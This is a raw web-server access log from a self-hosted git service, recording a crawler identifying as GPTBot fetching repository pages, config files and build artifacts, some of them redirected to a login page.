"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:00:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor" +[17/Feb/2026:16:00:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor" +[17/Feb/2026:16:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor" [Client 74.7.227.38] [Length 10435] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:00:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor" +[17/Feb/2026:16:00:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:16:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12437] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" +[17/Feb/2026:16:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm" [Client 74.7.227.38] [Length 23387] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:16:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?files=.gitignore" [Client 74.7.227.38] [Length 17111] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" +[17/Feb/2026:16:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:16:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:16:00:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12054] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10094] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 1468] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:16:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13545] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" +[17/Feb/2026:16:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11618] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71173] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 71877] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37023] [Gzip 14.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13510] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" +[17/Feb/2026:16:00:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:16:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38589] [Gzip 14.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" +[17/Feb/2026:16:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 71906] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10215] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:16:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99662] [Gzip 29.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 99883] [Gzip 29.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:16:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47654] [Gzip 26.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 